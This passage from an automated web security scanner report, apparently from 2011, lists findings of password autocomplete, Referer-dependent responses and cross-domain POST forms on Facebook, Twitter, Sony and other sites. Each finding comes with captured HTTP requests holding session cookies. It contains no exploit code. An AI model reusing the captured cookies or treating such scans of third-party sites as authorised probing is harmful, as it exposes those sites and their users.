<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e17c4f5eb6decd15e67b3e1ee968da07aa78012a" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

7.2. http://www.facebook.com/sonyelectronics  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

7.3. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78487
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude
...[SNIP]...
</div>
<form name="profile_info" action="Logon" method="post">
<!-- BEGIN Hidden Fields -->
...[SNIP]...
</label>
<input name="logonPassword" maxlength="25" type="password" /></li>
...[SNIP]...

8. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e035ae8217e38c49740601" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.5.35
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:49 GMT
Content-Length: 13092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e035afdbb4715c58767866" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></
...[SNIP]...

9. Cross-domain POST  previous  next
There are 23 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://wiki.novemberborn.net/sifr3/DetectingCSSLoad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/DetectingCSSLoad

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/DetectingCSSLoad HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Wed, 25 Feb 2009 20:37:20 GMT
ETag: "679-1b17-463c433c30000"
Accept-Ranges: bytes
Content-Length: 6935
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>DetectingCSSLoad in sIFR 3 Documentation & FAQ</title>
   

<link href="/styleshee
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.2. http://wiki.novemberborn.net/sifr3/JavaScript+Configuration  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/JavaScript+Configuration

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/JavaScript+Configuration HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Wed, 25 Feb 2009 22:00:23 GMT
ETag: "68d-29fb-463c55cc58bc0"
Accept-Ranges: bytes
Content-Length: 10747
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>JavaScript Configuration in sIFR 3 Documentation & FAQ</title>
   

<link href="/s
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.3. http://wiki.novemberborn.net/sifr3/JavaScript+Methods  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/JavaScript+Methods

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/JavaScript+Methods HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Sun, 29 Nov 2009 17:29:14 GMT
ETag: "68e-3de8-47985dd1b2e80"
Accept-Ranges: bytes
Content-Length: 15848
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>JavaScript Methods in sIFR 3 Documentation & FAQ</title>
   

<link href="/stylesh
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.4. http://wiki.novemberborn.net/sifr3/Styling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/Styling

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/Styling HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:36 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Sun, 29 Nov 2009 17:32:47 GMT
ETag: "699-2c27-47985e9cd4dc0"
Accept-Ranges: bytes
Content-Length: 11303
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Styling in sIFR 3 Documentation & FAQ</title>
   

<link href="/stylesheets/instik
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.5. http://www.huddletogether.com/projects/lightbox2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
</p>

<form name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

9.6. http://www.omnitechsupport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.1.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.7. http://www.omnitechsupport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.1.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<form name="form1" method="post" action="https://secure.logmeinrescue.com/Customer/Download.aspx?EntryID=215642">
<tr>
...[SNIP]...

9.8. http://www.omnitechsupport.com/about.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /about.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /about.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.4.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.9. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td width="159" align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.10. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.11. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td width="161" align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.12. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.13. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.14. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
